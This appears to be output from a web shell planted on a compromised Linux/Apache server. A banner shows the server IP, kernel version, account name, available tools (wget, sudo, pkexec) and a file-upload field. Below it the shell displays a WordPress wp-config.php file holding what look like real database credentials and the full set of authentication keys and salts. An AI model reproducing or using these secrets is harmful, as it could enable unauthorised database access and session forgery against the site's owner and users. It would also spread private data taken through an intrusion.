| Server IP : 69.39.225.240 / Your IP : 216.73.216.138 Web Server : Apache System : Linux bronze7.serverhost.net 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64 User : reademotions ( 1074) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/reademotions/www/configRTY/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'silverli_wp_ROOT' );
/** MySQL database username */
define( 'DB_USER', 'silverli_wp_MqrU' );
/** MySQL database password */
define( 'DB_PASSWORD', 'cpxsl98s7ThPEmHfVyKE' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '-] 6=DMD{i4#QwK5lNc{0ndr<11@v. UcCNeNHs}ZftU=3uIkzut^}be)b1k]P+G' );
define( 'SECURE_AUTH_KEY', 'GLgrkP6sO)//er*d3+`)IS=8ZZuFbS(:iaCoDi; 3ZC>CE3^$w)uHQ@HXOGN0k99' );
define( 'LOGGED_IN_KEY', 'IP6ff7> Y]pwXg}Hgv#x3NZM:a8&<t<qpEbBt0$vd.`0?`+2@s|$Q|rPf()ecAW<' );
define( 'NONCE_KEY', 'U,{k!p@9<YN2U%nA[k<L|O3b:`,[{kvW({vpHm`Qb?TZo &$RF1N|w@=$pUxODQZ' );
define( 'AUTH_SALT', 'Z`V/lq8D?%?8AFgtVA4>A)&1eZ~UZPq-/j:Gj{n,:})REN`jWS0!zkGLki8k2{j9' );
define( 'SECURE_AUTH_SALT', 'E0t|kzzsSXTR$#blna,yTF&w8#<BO0Lv*:;{<6G(?HvQpUsS$guw!91,*`g]>];#' );
define( 'LOGGED_IN_SALT', 'r.}f`B/7PF>h<->uI.D6R7bJ$pesItb|kxd**n2(OSWMdH0_pHjm`UjspFvXs`1G' );
define( 'NONCE_SALT', ',TNOm%5|5v<Ey|`M0e]isK7}*]G,P^17-QKcIs(PdFm6?.TSn;XvP**k|UL2@|8T' );
define( 'WP_CACHE_KEY_SALT', 'SPY55&i#/A`3;z=e2L@wm4/SG0MSd3QZ u.Fafh/:;4_o34d*UB2H8:TP5/hv3>s' );
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', dirname( __FILE__ ) . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';